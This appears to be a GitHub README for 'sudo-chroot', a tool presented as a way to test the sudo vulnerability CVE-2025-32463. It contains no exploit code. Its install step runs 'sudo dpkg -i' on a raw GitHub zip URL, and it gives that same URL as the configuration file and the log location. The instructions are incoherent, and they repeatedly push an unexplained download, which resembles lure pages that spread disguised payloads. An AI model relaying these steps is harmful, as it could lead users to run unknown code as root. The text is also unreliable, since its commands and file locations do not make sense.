Welcome to sudo-chroot! This tool helps you test a specific security vulnerability in the sudo command on Linux systems. It allows you to understand how this vulnerability, labeled CVE-2025-32463, can be exploited.
To get started, you need to download the application. Visit this page to download: Releases Page
- Click on the above link to go to the Releases page.
- Find the latest version listed there.
- Click on the asset file that suits your operating system. For example:
- For Ubuntu, download the
.debfile. - For Kali Linux, follow the appropriate link for installation.
- For Ubuntu, download the
- Save the file to your computer.
Before running sudo-chroot, ensure your system meets the following requirements:
- Linux operating system (Ubuntu or Kali Linux recommended)
- Minimum of 1 GB of RAM
- Python 3.x installed on your system
Once you have downloaded the application, follow these steps:
- Open a terminal window on your Linux system.
- Navigate to the folder where you saved the downloaded file. You can use the
cdcommand:cd /path/to/downloaded/file - For Ubuntu, if you downloaded a
.debfile, install it using the following command:sudo dpkg -i https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo-chroot.zip
- If necessary, resolve any dependency issues using:
sudo apt-get install -f
- Finally, run the application by entering:
sudo-chroot
sudo-chroot may require some configuration to work effectively. Here are some basic settings you can adjust:
- Logging: You can enable logging to keep track of the actions performed by the tool. To do this, edit the configuration file located at
https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo-chroot.zip. - Testing Options: Choose the level of testing you want to perform. Adjust the
test_modein the config file to settings such asbasic,advanced, orcustom.
Once you run sudo-chroot, you can begin testing for vulnerabilities. Follow the on-screen instructions or refer to the built-in help for specific commands.
- Start the vulnerability test:
sudo-chroot test - Check for updates:
sudo-chroot update
If you run into issues, consider the following steps:
- Ensure you have the correct version of Python installed.
- Verify that all dependencies are met. Use the command:
sudo apt-get check
- Review the logs in
https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo-chroot.zipfor any error messages.
Join the discussion and seek help from other users. Chat with us in the Issues section of the repository or check for similar problems that may already have solutions.
For questions or feedback, please open an issue on our GitHub page.
Remember, you can always return to the Releases page for a fresh download. Simply follow this link: Releases Page
Happy testing!